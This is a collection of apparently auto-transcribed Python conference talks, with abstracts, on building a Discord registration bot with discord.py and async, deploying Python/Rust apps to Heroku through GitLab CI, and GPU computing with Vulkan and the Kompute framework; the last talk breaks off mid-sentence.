They do have boards that help you to moderate your community because, well, if you're a community welcome, anybody to join, you may want to have some moderations. Make sure that everybody is nice, you know, because code of contact is something that is important, right? Also, there's other things that you can integrate so people can have more fun using Discord. There are other tools that you can use to help your productivity actually. So when my team started to use Discord, we tried different things, we tried some calendar tool that give us reminder or put our meeting schedule on Discord. We do try, you know, we do have a dice board that we could actually floor dice using the board. That's actually fun when we are doing some kind of ice breaking things. So you can even play games, right? You can even sell games there actually. So that's really cool. So this API actually, you can do a lot of things. Well, you can check out the documentation there. I put the link there. So it's very, you know, like I said, it's kind of designed for developers to use it. So, but, you know, not everybody like Reddit API from the start, right? Because, you know, sometimes if your board is more complicated, of course, you will use a programming language of your choice to create this board. And then you don't want to write out this kind of API interface every time when you create, you know, a new board, right? So here is Discord.py coming into your rescue because it's designed to be used in Python. So you can use Discord API with your Python code very easily and is used as an a-sync, which, like I said before, is kind of like a new to me when I, you know, when I first try to write a board on Discord, then before that I've never used a-sync. I know that, you know, if you're developing web apps, a lot of times you will be using a-sync. For example, you know, Flask application, a lot of times you're using a-sync. But for me, it's quite new. I was, well, I'm not a web developer. I rarely do web-related kind of development. So, yeah, this is kind of new thing to me. So what they have done is actually they have a big rewrite before, so they've changed from zero version to like version 1.0 and beyond. So if you go to check out the latest documentation, you'll see that it's actually in one, you know, so there's actually two big versions. So sometimes if you look for a solution of how to do things, make sure that the answer is more reasons, you know, on Stack Overflow or things like that, right? It happens a lot, you know, for example, the Python 2, 3 things that sometimes when you Google something in Python 3, if you just type Python, you know, some answer may come up as like Python 2 answers. So it may not work in your Python 3 code. So the same applies to when you use this code, the py, make sure that the help that you get is actually in the sense of the newer version, the rewrite version. So also because it's very, you know, they got a really big community and also is a very popular tool. So the development of the tool is very fast. And also like every time if this got API, have some updates, of course, there will be an update in this code.py to follow. So just make sure to update it as frequently as possible because the development is quite fast. So there's something to really keep an eye on. So now I will give you a brief code walkthrough of the Discord bot that I built for your Python. 
Basically it's code to check whether people have the right ticket, that they have the right name and ticket number. Bear in mind that this was almost half a year ago, so like I said, this code may not work right now if you're using the latest version of Discord.py, because development is super fast; you can see the last commit was in July, so it's definitely out of date, but I'll show it as an example. Also, it's not a very nicely packaged thing; you may see that the code is a bit rough, because this is something we built in a short time right before the conference. We just wanted to make sure it worked and was running in the cloud. It's kind of a one-off, just for us to use, and I'm the sole maintainer of it, so that's why it's a bit ugly, but please don't worry too much about that. Okay, so there are some basic things. I have a logging system, just so we can extract the logs if we have to. There are also a few environment variables where we store the channel IDs. You most probably want to keep those private, because, well, if you are using Discord you can switch on developer mode and check the ID of any channel you're in, but you still don't want it to be public, because people who are not in your channel could find the ID and might abuse it. You never know; they should not have the right permissions to do so, but just to be safe I'd love to keep those private. That's why I put them in environment variables, so that when you put your code publicly on GitHub it doesn't show anybody. This part just checks whether we have those variables set up. Things like the name, EuroPython, are hard-coded; yeah, this is very rough and not very well packaged, you can't really change it as an external variable, but that's fine. There's also some text that I've put in there, and this part is straightforward, nothing fancy: it just sends a different welcome message when we register people with different roles. Okay, so here is the Discord.py part: everything is built on commands.Bot. This is kind of like the client object you create when you use some API client, it's similar to that. The bot object is very important, you will see it everywhere later. We just set up a bot, and there is some basic metadata you can set up, a description for example, and also command_prefix, which is the prefix the user has to type to trigger the bot. Again, metadata about the bot that you can set up in advance. Then here's just another helper function, and some other helper functions; I'll skip over the things that are not very relevant. Now here, this is something different: now we're using async. Instead of just defining a function like you would do all the time, one thing you see that is different in async code is async def, and inside the async def you'll most probably find await. Async and await, this is something new, and I'll go into detail later in the presentation, but let's go through the code first. So this bot here, like I said, is kind of like a client and is very important.
So for example, if you want to set up an event listener, you use the @bot.event decorator to basically turn your async function into a listener. These are very useful. This one just runs a few things once the bot is ready. There are other event listeners as well; you can check them out in the documentation, I don't have enough time to go through them all with you. Then there is @bot.command, which sets up the different commands that you can trigger with your prefix. My prefix is an exclamation mark, so if someone types exclamation mark register, they trigger this async function here. I'll skip over the things that are not too relevant. There's also a help command you can set up, because like I said my bot replaces the default help; that's what I did here. And then this is the last thing that's important: this is just the event loop, where you schedule this async helper as a task that runs in the event loop. I'll explain that in a bit. Then, to make sure your bot runs, you have to call bot.run and pass your token here. This is how your bot is authorized to run in the server it belongs to, because on Discord you create a bot almost like a user: it's similar to creating an account for yourself, but you create it for your bot through the developer portal, and each bot is given a token. It's a secret, so at the end, when you deploy your bot, you give it this secret here so it takes on the identity of the bot you registered on Discord. Once you set that up, you just have to invite your bot into your Discord server, your community, and then your bot can do the things you gave it permission to do, and of course it will run the code. The code needs to be deployed; the most common way is to deploy on a cloud server or something like that, but just for fun or experiments you can run it on your local computer as well, as long as it has an internet connection all the time, because your bot needs to be online. That works too, but of course in a production environment you won't do that. Okay, so here is the code, just a very brief look; I hope you get an idea of how it looks.
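To tie the walkthrough together before moving on to the async story, here is a minimal, self-contained sketch in the spirit of that bot. It uses the discord.py 1.x-era API described above; the command, messages and environment variable name are my own placeholders rather than the EuroPython bot's actual code.

```python
import os
from discord.ext import commands

# Keep the secret token out of the code, as discussed above.
TOKEN = os.environ["DISCORD_TOKEN"]

bot = commands.Bot(command_prefix="!", description="Registration helper bot")

@bot.event
async def on_ready():
    # Event listener: runs once the bot has connected to Discord.
    print(f"Logged in as {bot.user}")

@bot.command()
async def register(ctx, ticket_number: str, *, name: str):
    # Triggered by "!register <ticket number> <name>" in a channel the bot can read.
    # A real bot would check the ticket against the registration data here.
    await ctx.send(f"Thanks {name}, ticket {ticket_number} received!")

bot.run(TOKEN)
```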
So let's continue our story about async. This is the story about async that I first told on my Twitch stream. Once upon a time, there were generators in Python. I assume you already have some Python experience and know about generators: you can create an iterator that loops through things. A generator is kind of like a function, but instead of just returning once and being done, it yields a value back and then hangs there, paused, until you call it again. Generators are what's behind iterators, what's behind a for loop when you write a for loop. But even if you have used generators before, maybe you haven't noticed that you can actually send something back into a generator. Most of the time we think of a generator as something we only get values out of, and that's only half true: you can also send values back in. Here's a small code snippet: of course you can yield a number from your generator, but you can also send a number back in by calling the send method. We create a number generator with n equal to 10, and when we call next on it, it executes until it reaches the line number = yield. Usually you write yield something to hand a value out; here we just execute until we hit the bare yield and it stops there. It doesn't give anything back, it yields None, so if you look at what that first next call returns, it's just None. That doesn't matter, because we then call g.send(5), which resumes execution: now number is equal to five, we check that five is less than ten, and we go around the while loop again. It keeps going until you send something that is greater than or equal to ten, and then it stops. That's how it works. It's a bit funny at first, but you get used to it when you see and use more examples. It's difficult to find a use case for it unless you're writing something very close to async, and you can already see why this is very similar to async. So this is how it evolved: in Python 3.3 we got yield from, which lets us make these pipelines more complex. We can now chain a bunch of different generators together, so the send-things-back-and-forth trick has a more powerful version. Using yield from, you can chain three generators up, and as you step through them the control is passed all the way up and then down again. I think I was running a little slow before, so I'll speed up this part a bit. You can see that when we call the top one, control passes all the way down to the bottom and then back up to the top, so all these generators are passing control to each other.
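Here is a reconstruction of the kind of snippets described above: a generator you can send values into, and a tiny yield from chain. The exact code on the slides may differ slightly.

```python
def number_generator(n):
    number = yield          # bare yield: gives back None and waits for .send()
    while number < n:
        print("received:", number)
        number = yield      # pause again until the next value is sent in
    print("received", number, "which is >=", n, "- stopping")

g = number_generator(10)
next(g)                     # run up to the first yield; returns None
g.send(5)                   # resumes with number = 5, loops, pauses again
try:
    g.send(12)              # 12 >= 10, so the generator runs to the end
except StopIteration:
    pass

# Chaining generators with yield from: control (and sent values) pass
# straight through the middle layers.
def bottom():
    return (yield "from the bottom")

def middle():
    return (yield from bottom())

def top():
    return (yield from middle())

t = top()
print(next(t))          # "from the bottom": control went top -> middle -> bottom
try:
    t.send("hello")     # the sent value travels all the way down to bottom()
except StopIteration as stop:
    print(stop.value)   # ...and its return value comes all the way back up
```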
This is something very different from the sync code that you're used to, and it's how we step more and more towards async. Because we are passing control from one generator to another, we can change how things are called: we can have one piece of code running, pause it and pass control to another piece of code that keeps running, which passes something back, and then we continue from where we left off. This is async. That's why, going on from 3.3, developers saw that Python could actually be used like an asynchronous programming language, like JavaScript and others. So asyncio was created as a standard library, and it introduces the event loop and coroutines that you can use when writing Python code. This is the first time async became official in Python, as a standard library that you can import. So what is an event loop? I've mentioned it a few times already in this talk. Think of an event loop as a task manager. Like I said, we now have different parts of the code that run by passing control around from one to another. When does each part execute? When does it pause? Especially when we are running them asynchronously, somebody has to decide when to pause, when to run, and who to hand control to, and we need a task manager for that. The event loop is that task manager: it controls what runs together, what pauses when, and who control is passed to. All these intricate things are managed by the event loop. And a coroutine is, well, one of those snippets of code. In the synchronous world we call these snippets functions, because there's no other way: only one thing happens at a time. You have your main code, you call a function, the function runs, and then the main code continues. There's no back and forth; you can only call from function to function, but you can't pause a function and go back to it later like you can with generators or coroutines. A coroutine is like a YouTube video: you can pause it at any time. If you're watching a movie on YouTube, you can pause it, go to the bathroom, come back and play it again. A function is something you can only play once: if you return, that's it, you can't go back to where you left off and continue. But a coroutine is like a YouTube video, you can pause it and come back to it. YouTube is even so smart that if you pause something in the middle, close your computer, and come back to the link tomorrow, it remembers where you left off if you're signed in, which is really cool. A coroutine is like that. So all of this gives us the tools we need to write async code.
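To make the "event loop as task manager" idea concrete, here is a small self-contained example using today's syntax (which the talk gets to in a moment); the coroutine names are just illustrative.

```python
import asyncio

async def make_tea():
    print("tea: put the kettle on")
    await asyncio.sleep(2)      # pause here; the event loop runs something else
    print("tea: pour the water")

async def write_slides():
    for i in range(3):
        print(f"slides: writing slide {i}")
        await asyncio.sleep(1)  # hand control back to the event loop

async def main():
    # The event loop interleaves both coroutines at their await points.
    await asyncio.gather(make_tea(), write_slides())

asyncio.run(main())
```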
This is how it looks in Python 3.4. You can still write things this way in current versions of Python, but there are better ways to do it now; this is what it looks like if you need to be compatible with Python 3.4. You would have asyncio imported as a standard library. You can see that we have a generator here, with a yield from, and if we add the asyncio.coroutine decorator, because coroutine is actually a decorator, it becomes a coroutine that you can put into the event loop. In asyncio you create an event loop by calling get_event_loop, and then you put your tasks in there; these two tasks run together in the event loop until they're done, and then you can close the event loop. run_until_complete just means: run the tasks I've set up until they finish. This is already very nice, but it's not the most fluid way to code, because you still have to use the decorator, and all the syntax is still based on the generator format, where yield from can be a little daunting for people who aren't familiar with it. So we have yield from, and then Python 3.5 is one step forward: we get the async and await that everybody loves. Now, instead of writing a generator, you can just write an async function like a normal function. The difference is that, besides return, which you can still use, you have await: it's an async coroutine, so you can await for the answer to come back, and you can also await this async function from another one. I call it an async function, but really it's a coroutine. So this stuff here is also async, and you can await it and wait for it to return something back. Okay, so that's a brief introduction to how async works.
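As a rough side-by-side of the two styles just described (not the exact slide code): the Python 3.4 decorator form is kept only as a comment here, since it was deprecated in 3.8 and removed in 3.11, while the 3.5+ form below runs as-is.

```python
import asyncio

# Python 3.4 style (decorator + yield from), for historical comparison only:
#
#   @asyncio.coroutine
#   def old_style_task():
#       yield from asyncio.sleep(1)
#       return "done"
#
#   loop = asyncio.get_event_loop()
#   print(loop.run_until_complete(old_style_task()))
#   loop.close()

# Python 3.5+ style: async def + await.
async def new_style_task():
    await asyncio.sleep(1)   # pause here and give control back to the event loop
    return "done"

async def main():
    print(await new_style_task())

asyncio.run(main())
```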
Now, for the next few minutes, I'll go through some questions I had in mind when I was writing async code. The first is about mixing sync code with async code. Like I said, you can still return inside your async coroutine, and you can still call a sync function; so if I call a sync function inside an async function, what will happen? The other question: I want to loop through things. I have different parameters and I want to run my async coroutine on each of them, but I don't want to run them like a for loop, one by one; I want multiple coroutines, using the different parameters I set up, all running together. How can I do that? I found answers to these two questions on Stack Overflow; I put the answers in the slides, but I'll go through them quickly before my time runs out. First: you cannot await something that is not async. For example, here I have just a normal function, def and return, definitely sync, and here we have an async function, and we can't await the sync one; that will give you an error, you can't await something that's not async. So how can this do_task, which is async and runs in the event loop, call a function that is sync? You might ask why I don't just make it async. Well, sometimes you're calling a library that isn't async: it's already written, and it's not async. What you can do is use the event loop method run_in_executor: you put your sync task into an executor and turn it into something you can use inside your async function. You can see that it becomes its own task that you can await; do_task is still async, but down here it waits for the value returned from the long-running sync task. Otherwise things would get a bit messed up, because this part is async while the other thing is still running; now you know that inside this coroutine you have to wait for the sync task to finish. So that's how you can await a sync function and make it work within an async context. Question number two: how can you write a for loop in an async kind of way? This is another question I had, and someone else asked it too. There are different parameters that I want to feed into one coroutine and run all of them in an async manner, not like a plain for loop. You can't simply mark a normal for loop as async and have it run concurrently; that's not something the syntax gives you. What you do is, again, let asyncio save the day: you can use as_completed, put a map inside it, and then await the futures. So the for loop actually gives you awaitables that you await, which is super cool. I don't have enough time to go into detail, but this is how you can handle it: instead of a for loop over a plain iterator, it becomes a kind of awaitable iterator. You can think of it this way.
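Putting both answers together, here is a hedged sketch of the pattern (function and variable names are mine, not from the Stack Overflow answers): run_in_executor wraps a blocking sync call, and as_completed over a map gives the "async for loop".

```python
import asyncio
import time

def long_running_task(x):
    # A plain sync function, e.g. from a library you don't control.
    time.sleep(1)
    return x * 2

async def do_task(x):
    loop = asyncio.get_running_loop()
    # Run the sync function in the default thread pool so it doesn't block
    # the event loop, and await its result from inside the coroutine.
    return await loop.run_in_executor(None, long_running_task, x)

async def main():
    params = [1, 2, 3, 4, 5]
    # The "async for loop": wrap every parameter in a coroutine and await the
    # results as they complete, instead of iterating one by one.
    for future in asyncio.as_completed(map(do_task, params)):
        print(await future)

asyncio.run(main())
```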
Everybody hates mundane tasks, they are boring, repetitive and time-consuming. That’s why I love building bots, they can finish my tasks for me by working 24/7. But to build a bot to interact with the users, you have to write in async. If you are afraid of async, don’t worry! Today I am telling you how I learn using async and how I avoid checking in 500+ people in a conference by building a bot with Discord.py. In the first part of the talk, there will be a short introduction to Discord. As more and more conference goes online, it’s become a more and more popular tool among the Python community. I will also introduce Discord.py, a python library that offered an async API to let you build a Discord bot. This will give the audiences a background about the following quick demo and explanation of a simple bot that I built. In the second part of the talk, I will walk through how to build a bot for registering attendees for EuroPython. Following a quick demo, I will also give a walkthrough about some of the async coroutines available in Discord.py: event listener like on_ready and commands. I will also explain how the async code is different from the sync code and the danger of mixing them together. Hopefully, audiences will be inspired to build their own bot and learn a little bit about writing async code in Python and using Discord.py. This talk is suitable for attendees who got basic knowledge in Python but not necessarily know about Discord or async.
10.5446/53296 (DOI)
Hi everyone, I'm so happy to be here joining the Python devroom at FOSDEM this year. Today's talk is about how to get started with Python and GitLab CI. There are different kinds of Python apps you can use a continuous integration tool for, but let's talk about apps built with Python and Rust. When I first started learning about continuous integration, there was enough documentation about how to use a tool like GitLab CI with Python to publish your application on a cloud platform like Heroku, and there was enough documentation about how to do the same for Rust, but there wasn't enough documentation about how to configure your CI tool for applications built with Python and Rust together. You can use Rust for writing native Python modules, and you can run Python code directly from a Rust binary; there are libraries for that, such as the cpython and PyO3 crates, and if you go to crates.io you can find others. As for configuring the local environment, there are several ways to install Python that you may be familiar with already: you can download it from python.org, on Linux you can install it from the repositories using your distribution's package manager, and you can also use pyenv. Something to remember is that if we want to use Python with Rust, we have to build Python with --enable-shared, for example if you decide to use pyenv to install and manage the Python versions for the project you are working on. For installing Rust you can use rustup; you can find more information on the official website, rustup.rs. You can install the stable, beta or nightly version of Rust by running the command you see here. Or you may want to build a custom Docker image with Python, Rust and the development tools you require; you can find the Dockerfile I am using to build such an image on gitlab.com. Now, something about Heroku. Heroku has support for Python and Rust: there is an official buildpack for Python and a community buildpack for Rust. But something to consider is that Heroku doesn't support Python built with --enable-shared, and you will need Python built that way to run applications that combine both technologies. Still, let's go over the support that Heroku offers for Python and Rust. For Python there is an official buildpack. To specify the dependencies of your project you can use a requirements.txt file, or a Pipfile if you are using Pipenv. You have to create a Procfile with the instruction that Heroku will run to start your application, and you have to specify the runtime, the Python version you are using for the project, by creating a runtime.txt file. And if you decide to use a tool like Poetry, there is a buildpack that supports it. For Rust there is a community buildpack. Apart from your Cargo.toml file, which is where you specify the dependencies and some additional configuration of your application, you have to add the Procfile that contains the instruction to start the application, and a RustConfig file with the version of Rust you are using for the application you are working on.
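Going back to the --enable-shared requirement: a quick way to check whether a local interpreter (for example one installed through pyenv) was built that way is to ask Python itself via sysconfig. This is just a convenience check, not something shown in the talk.

```python
import sysconfig

# A truthy value means CPython was configured with --enable-shared,
# i.e. libpython exists as a shared library that Rust can embed.
print(sysconfig.get_config_var("Py_ENABLE_SHARED"))

# Where the shared libpython lives, which is useful when linking:
print(sysconfig.get_config_var("LIBDIR"))
```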
Something I didn't mention is that if we are building apps with Rust and Python, the crates available for that require the nightly version of Rust, so that's the version we have to specify in the RustConfig file. The demo I want to show you is a web app built with Rust that has access to a Firebase database. When I started working on this demo I found out that there wasn't a working Firebase driver for Rust, so I decided to use the Python library. The GitLab repository you see in the slides is the application I will be showing later; it's the repository with the code for the application and all the configuration files we require, which I will explain later. If you want to check the code, just go to that repository. So, let's talk about continuous integration for Python and Rust. For the CI/CD configuration of a Python app, we have to create a Procfile, as I mentioned before, and that Procfile will contain this instruction: we add gunicorn as a dependency of the project, and this is how we start the application. We specify the dependencies of the project using a pyproject.toml file or a requirements.txt file, depending on how we are managing them, and we specify the version of Python we are using. You can check the code here; you will find the configuration files and see how GitLab CI is configured for that. For Rust, the Procfile will contain this instruction: since Heroku randomly assigns the port the application will listen on, we have to assign that value to this variable so the application runs properly. We also specify the environment the app will run in, in this case a production environment, and the path of the binary that Rust creates when we compile the application. We have to make sure that the Cargo.toml file is in the repository, add the RustConfig file specifying the version of Rust we are using, which could be stable or nightly, and add the Rocket.toml file. That file contains configuration about the URL and the port and other settings related to where the application can be accessed, and the URL is the one Heroku assigns when you create a new app on the platform. We also have to add the GitLab CI configuration file; you can check it in the repository listed in the slides. Now, talking about continuous integration when we are building apps using both technologies: since Heroku doesn't support Python built with --enable-shared, we have to use a Docker image to deploy our application to Heroku. Instead of creating a Procfile, we create a bash script containing the instruction to run our application, and we make sure that the files describing the dependencies of our project for both languages, Python and Rust, are available in the repository: the Cargo.toml file, and, if you are using Poetry, a pyproject.toml file, or a requirements.txt file, depending on how you manage your dependencies, plus the Dockerfile with the instructions to build the custom Docker image with the application.
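For the Python-only case, a Procfile line such as "web: gunicorn app:app" expects a module exposing a WSGI callable. A minimal app.py could look like the sketch below; the module and callable names are my assumption, not taken from the talk's repository.

```python
# app.py -- minimal WSGI application that a Procfile entry like
# "web: gunicorn app:app" could serve (names are illustrative).
def app(environ, start_response):
    body = b"Hello from Heroku via GitLab CI!"
    start_response("200 OK", [
        ("Content-Type", "text/plain"),
        ("Content-Length", str(len(body))),
    ])
    return [body]
```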
As for the project's dependency configuration, if you are using Poetry, this is how the file looks. This is a demo of a web app built with Rust that has access to Firebase; we are using the Firebase library for Python, these are the dependencies for that, and we have to specify the version of Python we are using. And this is how the Cargo.toml file looks: we list the dependencies we are using, Serde, which is a library for serialization and deserialization of data, Rocket, which is a web framework for Rust, and cpython, which is the crate I chose for developing this demo. I specify the versions of those libraries here, and the version of Python I am using for this application. To configure Heroku, we have to create a new app. Normally we would add the buildpack for the language or technology we are using, and if we are using two different technologies we can add both buildpacks; but since we are creating a custom Docker image we don't need to do that, so we don't add the Python and Rust buildpacks. After creating the new app on Heroku, we go to the dashboard of our account and copy the API key. We will need this value to configure the repository and to tell GitLab CI how it can get access to our Heroku account, and that's what we do in the following step. To configure GitLab CI, in the repository we go to Settings, CI/CD, click Expand, and in the Variables section add a new variable named HEROKU_API_KEY, pasting the API key in the value field. For the GitLab CI configuration we create this file in the repository, and we will have two stages. One is for building the custom Docker image; after building it, we have to push that image to the Heroku registry. Heroku has a registry similar to Docker Hub or the registry that GitLab provides, and we have to add our Docker image to it; that's what the last instruction of the build stage does: we build the Docker image and then push it to the Heroku registry. In the last stage we publish that Docker image on Heroku so we can access the application. Once we create this file the pipeline starts, and we can see that in the repository; I will show you that in a minute. So let's go to the repository, but first let me show you the examples I mentioned before. This is one example of how we use GitLab CI for an application built with Python only, no other language. We have the Procfile here, containing the instruction Heroku will run to start the application; we are using gunicorn for that. I'm not using the community buildpack that supports Poetry, and that's why I have a requirements.txt file in addition to the pyproject.toml, which is the file Poetry reads to know the dependencies of the project. Here we specify the version of Python we are using, which could change depending on the kind of project we are building. And what is important is the configuration file for GitLab CI. We have only two stages, test and deploy. For testing, we install the dependencies listed in requirements.txt and then run the test script with Python. For deploying our application to Heroku we use dpl, running in the official Ruby Docker image.
We have to specify the name of the application, the name we assigned when we created it on Heroku, and this is the variable we created before. If we go to CI/CD, you can see the pipelines that were run. We have two jobs, test and deploy, which are the stages we specified in the GitLab CI configuration file. If we go to test, these are all the instructions executed in this stage: the dependencies are installed and the tests are run. If the job succeeds, we continue with the next stage, deploy. If we go to deploy, this is what we have: Heroku detects that this is a Python app, along with the version of Python we are using and the dependencies, and finally our application is available here. For Rust, this is the example I mentioned. Some files are different: we have the Rocket.toml file, and the instruction listed in the Procfile is different, since the way we build applications with Rust is different from Python. What is important here is the base URL, the URL that Heroku assigned to your application; we have to specify that here, in the configuration for the production environment. That was for Rust, but what is really important is this one: an application built with both languages, Python and Rust. This is the file with the list of dependencies for Rust, this is the file with the list of dependencies for Python, and run is the bash script containing the instructions needed to run our application. What matters here is the Dockerfile that contains all of the instructions. I'm using Poetry, and I'm also using pyenv, so I have to use that to configure the environment; I'm using a custom Docker image that I created. Here I specify the version of Python I will be using for this application, and here I install the Python dependencies and create a cached copy of them, so the CI/CD tool doesn't need to install those libraries again unless there are changes or a new version. After that I configure the environment for the Python code, just running poetry install, and build the Rust dependencies by running cargo build, preparing for a production environment. And here I specify the instructions that will run to start the application. After all of these instructions are added and the CI/CD tool is configured, we can check the pipelines here. We have two stages, build and release: here we build the custom Docker image and push it to the Heroku registry, and here we publish the application. If we go to the URL that Heroku assigned to the application I created, rust-python-demo.herokuapp.com, this is just a basic example that brings back a list of names stored in a Firebase database. And this is how we get started with GitLab CI for Python projects. I wanted to talk about how to configure a CI/CD tool like the one GitLab provides for applications built with Rust and Python, because there wasn't enough documentation about it, and I've been writing and publishing some blog posts to document how to properly configure the repository, the CI/CD tool and Heroku. I will write more about that later, but if you want to check some of the posts I've already published, I'm writing on dev.to, you can find me as MarioDMD on Twitter, and you can check the repository of the application I showed you.
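One aside before wrapping up: the transcript doesn't show the Python helper that the Rust code calls, but a minimal sketch of it might look like this, using the firebase_admin package against a Realtime Database. The module name, database layout and URL are my assumptions, not the demo's actual code.

```python
# firebase_names.py -- hypothetical helper that the Rust side (via the
# cpython crate) could import and call.
import firebase_admin
from firebase_admin import credentials, db

cred = credentials.Certificate("serviceAccount.json")   # assumed credentials file
firebase_admin.initialize_app(cred, {
    "databaseURL": "https://your-project.firebaseio.com",  # assumed URL
})

def get_names():
    # Read the list of names stored under a "names" node.
    return db.reference("names").get() or []
```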
If you have any questions feel free to ask and thank you so much for joining me today.
If you develop web apps with Python and want to take your project to a cloud platform like Heroku, using a continuous integration tool can help you with this process and optimize time and resources. Running tests and deploying your app are some tasks that this tool can help you with. Through this talk you will know how to use GitLab CI on your Python projects.
10.5446/53298 (DOI)
Welcome to my talk on beyond CUDA GPU accelerated Python on cross vendor graphics cards with Vulkan and compute. My name is Alejandro Saucedo. I am engineering director at selling technologies, chief scientist at the Institute for ethical AI, and member at large at the ACM. So we're going to be delving into a very interesting set of topics, primarily around the parallel and GPU computing ecosystem. We're going to talk about what is the Vulkan SDK, and how you can use the compute framework to build Python GPU accelerated applications together with a set of hands on examples, as well as some references, that you can actually delve into, if you're So, to start with, we want to cover the motivations of why parallel processing. And I'm going to be referencing a research survey. I recommend checking out as well in itself, as it basically collects insights from 227 papers in the parallel deep learning space, which provides a much more intuitive perspective of the adoption, and this trend of adoption on GPU for not just scientific computing, but also general purpose computing, and some key observations that are really interesting is to see how the emphasis around a lot of the functions and paradigms in this computational areas that can be abstracted into highly highly parallelizable steps, and others that may not in themselves be highly parallelizable, can actually be reduced into equivalent structures that that then can be processed with specialized hardware, like GPUs or even you know more than you might use. There's also concepts that are continuously evolving. You know, a simple one that may you may have come across is the concept of micro batching which is basically being able to not just process a single data point, but also being able to process several more at the same time to ensure that the computation is done at a single, or, you know, in a way intuitively on a single sort of parallel clock speed or clock iteration within that that perspective instead of just submitting each one separately, and very interesting and innovative ways of breaking down computation that can actually be processed in parallel to then be re aggregated. And the interesting thing about this paper is not only how the trend is moving towards this parallel processing, and you know GPUs and GPU type hardware, but also that it's expanding into distributed processing leveraging this parallel capable type of hardware. So really interesting area. Now, delving into the into the ecosystem, and the motivations of why, you know, we're even having a new sort of framework the Vulcan SDK which we're going to introduce in a bit is particularly given that there is this this year range and heterogeneity when it comes to the GPU and parallel capable processing hardware, like to be used etc. So this involves multiple different players multiple different architectures, different drivers, and consequently different frameworks available to take advantages of this parallel capabilities, as well as for example, you know, the increase in very powerful mobile capable components that now we're carrying in in our pockets as smartphones. So there is a sheer amount of need in this space due to the heterogeneity of the different hardware across different vendors. 
And the same perspective is one of the key motivations of why Vulcan came to be Vulcan is a cross industry initiative that brings in several of the leading industry players to create this open source and I think that's the one of the more exciting parts the open source and open sort of standard that focuses on not just interoperability but also performance, and this is reflected in the interface that is exposed by the Vulcan SDK. In regards to the Vulcan C++ SDK, there are several advantages and disadvantages as you would have with anything. Some of the very strong advantages is that it has a very low level interface with rich access to components that comes with this explicit and verbose API within its core that provides you a, you know, no language, sort of sophisticated verbose to your abstractions, pure direct access into not just the Vulcan SDK but also the hardware underneath right and this is very important for optimizations that are very important. There are a broad range of industry leading players that are contributing to the standards and to the SDKs and to the tooling, which has been very, very encouraging to see. And also, there is an emphasis towards this interoperability and high compatibility across different platforms, mobile suppliers, AMD and VDI Qualcomm etc. And there are very strong strengths right strong advantages. You know disadvantages you know, we also have that it's very low level with rich access to components which means that there is a lot of complexity, and you know a very rich interface that needs to be interacted with. And similarly with the C style API even though it provides you a what what you see is what you get with the hardware level. That means that there needs to be a lot of domain specific knowledge to be able to build the foundational layers required to start building the application components. Right with that. There's also the broad range of top players which even though it's a great thing, always with many opinions, many voices, there will be a lot of sort of interactions that will be pulling towards different directions even though they would have this sort of like best of a high compatibility in mind and trying to push for, you know what is what is best and again you know with a high compatibility across multiple different platforms that means that it needs to deal with a very rich interface that are not just rich interface but but rich set of flexible, you know, back ends that can actually interact with with this sheer number of different hardware that is underneath. And that's what the texture of the Vulcan SDK looks like so the Vulcan application is the overarching components that we will be seeing from applications you can actually spin up instances, these instances are the ones that then allow you to, you know, talk with the physical devices that C++ component that, you know, actually refers to the to the to the physical graphics card that you have in your computer. And then you can create what is referred to us logical devices or windows or views that then allow you to interact with the physical device right. So that logical device you know you can have multiple logical devices for one single physical device and we can have multiple physical devices for an instance, and multiple instances for an application. 
Right so this is where it starts getting a bit complex but to keep it simple, you know with this logical device the way that you interact with it with it with the graphics card is through a queue, and this queue would have multiple commands right and you know you can have multiple instructions that need to be executed. Right and ultimately this is how you would be able to submit instructions to the GPU. Once you actually want to run more complex components that's where the pipeline comes in. You know there's the compute pipeline the graphics pipeline but we're going to be just talking about the compute pipeline. This is all just to provide an intuition, you know we actually have another talk that you'll be able to reference and check out, as well as a documentation that explains all of this in detail this is just to give you an intuition once we delve into the depths of everything. With the pipeline. This is what you're able to say well I want to actually run a specific set of instructions as per a piece of code or an algorithm that is often referred to as a shader, a shader module. So this shader is basically going to look like a piece of C code that just so happens to run on the GPU itself. And this shader this piece of shader in the pipeline will also interact with data, right, and this data is referenced through the concept of the script or sets which again you know, you're not going to really have to like know all of these different things but it's still important to get an intuition that this is what's happening under the hood, right so the script or such as like a container that basically says well I'm going to be using this GPU visible GPU visible data, so that when you run a set of instructions it can actually reference this this different things. And you see that because we're interacting with this queue, the CPU in itself is able to send requests so you send send instructions to the GPU with its own specific memory address space, and even though there are shared memory spaces which means that you know the CPU may have access to see some of the data in the GPU memory. There is different address spaces for different computational areas in the in the actual hardware of the GPU which means that the actual code your C++ your Python will not be able to see that memory space. Right, and that means that you would be able to interact with your GPU with this SDK akin to what would be you interacting with a remote service, sending requests for the service to execute as if it was an API. And you know, even though this is not correct because this is your own machine. This is actually a good intuitive way to see how you're interacting with that GPU given that it is through this queue with, you know, asynchronous buffer that are executed and of course you can then have all the things that allow you to await until the execution has been finished, which we may actually talk about in later on. And, you know, being able to build the foundation code required to actually run a simple program in Vulkan, you know only takes, you know, from 500 to 2000 lines of C++ code, right. And this is the motivations well some of the motivations for compute itself the compute framework. So compute enables developers to get started interacting with the Vulkan SDK with dozens instead of thousands of lines of code. And the key thing to emphasize here is that the core principle is to augment the Vulkan interface instead of abstracting or hiding it. 
So bring your own Vulkan interface, which plays nicely with already existing Vulkan applications so you already have a Vulkan application to render graphics related stuff you'd be able to actually pass those Vulkan components, and it has non Vulkan naming convention and we're going to talk about that. It's just basically to avoid ambiguity as there are libraries that you know may have classes called buffer, and it's like is this buffer from Vulkan or for this other application right so things like that. So now, in regards to other features is that it has, you know, a C++ interface, but also the Python interface that we're going to be using today. It has explicit CPU and GPU memory ownership and this is important if you're using non compute Vulkan components right if you're already using Vulkan in another area of code role Vulkan. So we're planning access to GPU queues which is very important for optimizations, you know which we have some material that actually explores that in more detail. There is, you know, single header file for the C++ development and a Pi Pi module for easy installation with the Python, and it has integration with mobile apps through the Android and DK, as well as game engines, such as Godot, which is also part of the C++ and conference, and there is going to be a few links about that. So, how does the compute architecture look like. And this is basically relatively or conceptually simple. So everything starts with a compute manager, and the compute manager is the component that basically overseas and and manages all the explicitly and memory that is then created through your interaction with this, like compute application. So the manager in itself would handle this sort of like device and on the queue, which we talked about, you know, you don't need to go into that much depth, but it's still important. You can have sequences and sequences are basically basically single or batches of operations to run on the GPU. Right that's basically what a sequences, and you can have multiple sequences with multiple operations. Each sequence can have one or many operations, and each operation basically performs a specific action, and operation can have one or multiple tensors and tensors are basically abstractions into GPU and CPU memory, as well as the workflows related to move the memory around it. And optionally, 